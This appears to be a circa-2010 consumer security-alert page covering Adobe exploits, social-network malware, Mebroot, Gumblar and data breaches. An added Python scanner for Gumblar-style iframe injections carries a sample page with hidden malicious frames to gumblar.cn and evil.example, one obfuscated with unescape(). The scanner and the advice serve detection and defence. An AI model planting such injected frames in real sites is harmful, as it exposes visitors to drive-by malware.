April, 2010:  For the past two years, Adobe Reader has led the pack in exploit vulnerabilities.  In 2008, Adobe Reader attacks comprised 28.61% of targeted attacks; in 2009, that number jumped to 49.5%; so far in 2010, it is 61.2%!  By contrast, Microsoft’s key products have dropped significantly - Word is at 24.3%, Excel 7.1% and PowerPoint 7.4%.  This is according to security company F-Secure.  McAfee figures are similar, finding PDF exploits responsible for 49% of web-based attacks, Acrobat Reader from 2% in 2007 to 28% so far this year, mostly on unpatched machines.  It is key to your protection that you install Adobe Reader and similar updates when prompted - the most recent one patched a major vulnerability.  Starting on April 13th, Adobe will be experimenting with automatic patch installs, no prompting to install the updates.  Same for Flash, Java and Acrobat.  BEWARE: Those who push malware have also found a way to pose as patchers for Adobe and Java updaters - make sure you’re installing a real Adobe update - it usually doesn’t include attachments like spreadsheets.  Don’t be too smug if you’re running the Apple or Linux operating systems - these exploits will compromise these systems as well.  Be sure to patch and upgrade Adobe Reader, Acrobat, Flash and JavaScript promptly.  [Go to the Apple Support Downloads page.]

Those of you who opened the link to the “sexiest video ever” on FaceBook in May, 2010 received an unpleasant surprise, as it was an attack that tricks you into “updating” your software, which installs the Hotbar adware to generate revenue for spammers.  Similar for that June FaceBook message claiming “This horrific photo forced photographer to kill himself”.  And for the June, 2010 link to the “101 Hottest Women in the World” clickjack scheme.  See a pattern here?  Shame on you, by now you should know better!

Don’t open that gift certificate from Apple iTunes unless you’re sure that it’s from Apple.  Spammers are sending out e-mails claiming these awards, but they contain a dangerous ZIP file which infects Windows computers.  As always, check the source (Apple iTunes) before clicking on an unknown link or attachment.

2009

11/1/09:  Microsoft has issued a patch protecting users of Win2K, XP and Server 2003 from an exploit allowing remote code execution or launching of a denial-of-service attack from your computer.  The code is cleverly hidden in a specific type of Embedded Open-Type Font.  Yes, a font.  Good news is that the MS patch (MS09-065 (969947)) removes the threat.

1/1/09:  Another Facebook trojan (see Koobface, below):  Whitewell uses Facebook (in particular, the Notes section of Facebook’s mobile version) as a delivery method.  This trojan relies on the actual Facebook account to spread, rather than the server for Facebook itself, therefore it is different from many botnets.

3/23/09:  Beware of Twitter Phishing attacks.  If you get Tweets saying “lol is that you in here? +link to video” it may connect to a malicious virus.  The folks at Twitter write:  “A bit o’phishing going on - - if you get a weird direct message, don’t click on it and certainly don’t give your login creds!”  Beware of what you click on, don’t give away any information and beware of any shortened URLs (check where they lead using longurl).

2/24/09: Gmail users who are logged into Google Chat have been getting messages that appear to be from friends, urging them to click on a Web address starting with tinyurl.com that takes them to a site called ViddyHo, which asks for the person’s Gmail log-in and then hijacks the account, sending out chat messages to the user’s contacts and spreading itself further.  This phishing attack lures surfers to click on videos for hot topics and timely news events that can download malware onto their computers.

You can expect many more worms and other types of viruses on social networking sites like the new variant of the Koobface worm that targeted Facebook late last year.  It appears that virus code writers have decided that it’s time to infect these sites, which are often used by businesses now, in addition to individuals. THIS PREDICTION CAME TRUE IN OCTOBER, 2010:  a NEW VERSION WHICH CAN AFFECT BOTH WINDOWS AND MAC MACHINES THROUGH JAVA HAS MADE ITS APPEARANCE.

Sinowal (more recently a/k/a Mebroot) is back.  This is a “drive-by” download, credited (Washington Post) with stealing more than 500,000 bank account passwords, credit card information and other sensitive financial information.  This is a super Trojan that uses a technique known as HTML injection that puts very convincing information on your browser prompting you to enter confidential passwords or account numbers, then keylogs them and transmits them to thieves.  Because the infection resides on the master boot record of your hard drive (which it rewrites) in rootkit fashion, has no executable files to detect, no svchost.exe or rundll32.exe files to appear as processes, and has its own encrypted 128-bit external data transmission, it is virtually undetectable by anti-virus or anti-spyware software.  And, because it bypasses Windows’ normal communication routines, it works outside any firewall you might have.  While some rootkit detectors may find some versions of Mebroot, since it changes almost monthly, they really don’t have a chance of keeping up with the variants.  Good news for Vista users - since Vista’s boot method is different from XP’s, and its User Account Control regime (if you didn’t already turn it off as a nuisance) gets in the worm’s way, Mebroot is mostly directed at Windows XP users.  Some say that the infection gets in through Adobe Reader, Flash or Quicktime, even if they are fully patched.  So what to do?  Microsoft hasn’t done and doesn’t plan to do anything about MBR infections, and banks don’t seem to care either, so don’t depend on either to protect you from Mebroot.  Unfortunately, the best you can do is to religiously run your anti-virus, anti-spyware and anti-rootkit programs and be vigilant with your web surfing, particularly regarding financial institutions.  Sorry.

Anti-spyware vendor Webroot published a report on 9/29/08 that charted a rapid increase in the volume of infected files being distributed, in particular via peer-to-peer file-sharing networks, that have been disguised as campaign-oriented content.  Webroot specifically warned users to beware of malware files being propagated in files labeled as McCain and Obama campaign videos.  Webroot has seen large amounts of such infected files being traded on Gnutella, which is accessed by many users of FrostWire and LimeWire.  Webroot said a targeted search of the FrostWire network found some 34 search results for “Obama speech,” 14 of which contained some form of active malware, while 5 of the 19 results found for “McCain speech” were found to be carrying malware.  The most common malware variant was found to be W32/Zipware, a well-established Trojan downloader, containing a .zip file with executable files that, when run, infect the host machine with random malware, including rogue anti-virus applications, which in turn pretend to detect security issues on infected machines in an attempt to lure users to buy rogue AV applications for disinfection.  Webroot says that, in some cases, the files also include password stealers and backdoor infections as well.

Note about Trojan.NewMediaCodec: This virus wreaks havoc on computers taking advantage of a vulnerability in Windows Media Player. When users are "told" they need an upgrade to Windows Media Player in order to view movies on certain (adult) websites, the subsequent download installs a Trojan. Therefore, instead of getting some "enhancement," what really happens is that Trojan.NewMediaCodec downloads and installs additional malware on your machine. You very much want to remove this if it shows up on your computer.  See similar discussions about these “must have” uploads and players in the Hoaxes page of this site as well.

Don’t click on links in, or respond to, Tweets you weren’t expecting.  Duh! This is how many viruses and spyware propagate.  You may not even see the damage on your own computer, because it may be used to send out messages, allegedly from you, that carry the virus or spyware to others. True examples: You receive a Tweet from one of your friends offering a $500 Victoria’s Secret gift card (if you’ll just click), or inviting you to watch an awesome new video in which your friend stars (if you’ll just click), or promising to make you more money or increase your IQ (if you’ll just click), or asking “Are You in This Picture?” (click to see it).  This means that the sender’s account has probably been taken over by malware; your friend is an unknowing victim who most likely clicked on one of these same messages, continuing the chain of infection.  For more considerations about Social Networking, click HERE.

6/11/09:  Don’t assume that you can stop updating your Adobe Flash product (see the entry below).  The Gumblar trojan is still very much around.  Gumblar compromises legitimate websites and inserts hidden iFrames into their pages; those iFrames silently pull content from the malware-laden site gumblar.cn, which attacks visitors whose Flash is out of date.  Keep Flash updated and use LinkScanner or a similar link-checking tool for protection.
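What a Gumblar-style injection looks like on a compromised site, and how a webmaster can scan for it, as an added example that is not part of the original page: the scanner below walks a page's HTML and flags <iframe> and <script> tags that load from a host other than the site's own, are sized to zero, or are hidden with CSS; it also decodes the common unescape("...") trick that hides the injected frame inside an inline script. The sample page is constructed for the demo (the gumblar.cn host comes from the passage above; example-shop.com and evil.example are made up), and the site host passed to scan_html is an assumption you would replace with your own domain.

```python
"""Flag hidden or off-site iframe/script injections in HTML (Gumblar-style).

Added example, not code from the original page.  SAMPLE_PAGE is constructed
for the demo; the site host given to scan_html() is an assumption.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# document.write(unescape("%3Ciframe ...")) is a classic way to hide a frame
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False

    def _off_site(self, host):
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        host = (urlsplit(src).hostname or "").lower()
        reasons = []
        if self._off_site(host):
            reasons.append("off-site source " + host)
        if tag == "iframe":
            width = (a.get("width") or "").strip()
            height = (a.get("height") or "").strip()
            if width in ("0", "0px") or height in ("0", "0px"):
                reasons.append("zero-size frame")
            if HIDDEN_STYLE.search(a.get("style") or ""):
                reasons.append("hidden by CSS")
        if reasons:
            self.findings.append(
                {"tag": tag, "src": src, "line": self.getpos()[0], "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies arrive here; decode unescape() payloads and
        # scan the decoded markup as if it were part of the page.
        if not self._in_script:
            return
        for m in UNESCAPE_CALL.finditer(data):
            for finding in scan_html(unquote(m.group(2)), self.site_host):
                finding["reasons"].insert(0, "decoded from unescape()")
                finding["line"] = self.getpos()[0]
                self.findings.append(finding)


def scan_html(html, site_host):
    """Return a list of findings: {tag, src, line, reasons} per suspicious tag."""
    parser = InjectionScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate frame, one injected Gumblar-style frame,
# and one frame hidden inside an inline script via unescape().
SAMPLE_PAGE = """<html><head><title>Legit Shop</title>
<script src="/js/app.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="https://www.example-shop.com/promo" width="300" height="150"></iframe>
<iframe src="http://gumblar.cn/rss/?id=1" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape("%3Ciframe src=%22http://evil.example/x%22 width=%220%22 height=%220%22%3E%3C/iframe%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, "example-shop.com"):
        print("line %d: <%s src=%s> %s" % (f["line"], f["tag"], f["src"], ", ".join(f["reasons"])))
```

Run it over your own pages with your own domain as site_host; the legitimate promo frame on the site's own host produces nothing, while the zero-size off-site frame and the one reconstructed from the unescape() string are both reported. A real injection may be obfuscated further, so treat a clean result as one check among several, not proof of a clean site.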

Samy Kamkar, the hacker who brought MySpace to its knees in 2005, is now off criminal probation, and he has crafted new software that targets your home network router.  While the original Samy worm merely tagged your MySpace profile with the phrase “but most of all, Samy is my hero”, the new attack goes after routers whose administrative password was never changed from the factory default (such as admin/password).  Once in, Samy can read the router’s MAC address, use it to pinpoint the router’s physical location, and then conceivably either take control of your connection or load a malware payload.  Change your router’s default password.

We knew it would happen someday, and it finally has.  Pedophiles and others have found a way to use virus-infected PCs to remotely store and view their stash of child pornography without fear of getting caught.  You might not even know your computer was involved until the police knock at your door.  A number of people have been surprised this way and have spent thousands to clear their names.  Don’t be one of them: regularly scan your computer for viruses!

TJ Maxx announced in January 2007 an intrusion in which, over time, 45 million customer records had been exposed.  DSW Shoes, OfficeMax and Hannaford Bros. have all announced breaches of their computer systems as well, in addition to the unknown hackers who stole more than 360,000 customer records from Citibank.
